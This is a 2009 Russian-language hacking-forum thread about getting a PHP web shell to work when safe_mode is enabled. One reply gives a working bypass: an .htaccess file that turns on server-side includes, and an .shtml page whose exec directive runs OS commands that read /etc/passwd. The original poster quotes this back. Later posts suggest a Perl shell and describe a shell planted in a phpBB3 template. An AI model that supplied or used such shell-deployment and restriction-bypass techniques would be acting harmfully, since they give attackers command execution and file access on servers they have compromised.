ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Safe mode = on
  #1  
Старый 03.10.2009, 23:49
Аватар для imgreen
imgreen
Новичок
Регистрация: 15.11.2008
Сообщений: 22
Провел на форуме:
147571

Репутация: 6
По умолчанию Safe mode = on

Можно что-то сделать в данной ситуации? Я правильно понимаю, что в таком случае от шелла нет толку?
 
Ответить с цитированием

  #2  
Старый 04.10.2009, 00:01
Аватар для diehard
diehard
Постоянный
Регистрация: 30.09.2007
Сообщений: 815
Провел на форуме:
2590715

Репутация: 659


Отправить сообщение для diehard с помощью ICQ
По умолчанию

А что тебе надо от шелла? Команды ОС можно запускать из-под SSI например

.htaccess
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes

shell.shtml
<pre>
<!--#exec cmd="cat /etc/passwd;ls -lia"-->
 
Ответить с цитированием

  #3  
Старый 04.10.2009, 00:03
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

Версия пыха какая? доступ к CGI \ SSI \ и тп есть?
 
Ответить с цитированием

  #4  
Старый 04.10.2009, 00:18
Аватар для imgreen
imgreen
Новичок
Регистрация: 15.11.2008
Сообщений: 22
Провел на форуме:
147571

Репутация: 6
По умолчанию

Цитата:
Команды ОС можно запускать из-под SSI например

.htaccess
AddType text/html .shtml
AddHandler server-parsed .shtml
Options +Includes

shell.shtml
<pre>
<!--#exec cmd="cat /etc/passwd;ls -lia"-->
спасибо за информацию

Цитата:
А что тебе надо от шелла?
просмотр каталогов, редактирование файлов


Цитата:
Версия пыха какая? доступ к CGI \ SSI \ и тп есть?
Эмм, я вообще не про конкретный случай, а в общем случае... Но вообще вопрос возник в результате эксперимента на своем сервере. Шелл залил, а сделать как бы ничего и нельзя. PHP 5.2.6, c CGI и SSI дела не имел, даже не знаю как проверить доступ.

Последний раз редактировалось imgreen; 04.10.2009 в 00:25..
 
Ответить с цитированием

  #5  
Старый 04.10.2009, 05:30
Аватар для DrAssault
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638

Репутация: 256
Отправить сообщение для DrAssault с помощью ICQ
По умолчанию

Perl шелл как вариант...
 
Ответить с цитированием

  #6  
Старый 04.10.2009, 11:58
Аватар для InFlame
InFlame
Участник форума
Регистрация: 27.10.2008
Сообщений: 215
Провел на форуме:
810079

Репутация: 90
По умолчанию

http://forum.antichat.ru/thread46034-safe+mode.html
 
Ответить с цитированием

  #7  
Старый 04.10.2009, 18:06
Аватар для imgreen
imgreen
Новичок
Регистрация: 15.11.2008
Сообщений: 22
Провел на форуме:
147571

Репутация: 6
По умолчанию

большое спасибо
 
Ответить с цитированием

  #8  
Старый 05.10.2009, 15:16
Аватар для Shadrin
Shadrin
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171

Репутация: 270
Отправить сообщение для Shadrin с помощью ICQ
По умолчанию

в догонку,был шел в шаблоне пхпбб3,при Safe mode = on,версию пхп уже не помню,но когда я создавал шеллом файл(другой шелл) ,и при обращении с браузера было "access denied ", это уже тупик или можно что то сделать?
юзер апач,и права на создынный шелл были не ниже 644
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как отключить safe mode? ser_cher PHP, PERL, MySQL, JavaScript 7 13.07.2009 16:16
Проблема с Ipb 2.1.6 Safe Mode GrAmOzEkA Форумы 5 30.01.2007 00:02
Обход Safe Mode прл взломе Invision Power board 1ten0.0net1 Форумы 4 22.12.2006 16:34
set_time_limit в safe mode TANZWUT Уязвимости 2 28.01.2006 11:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ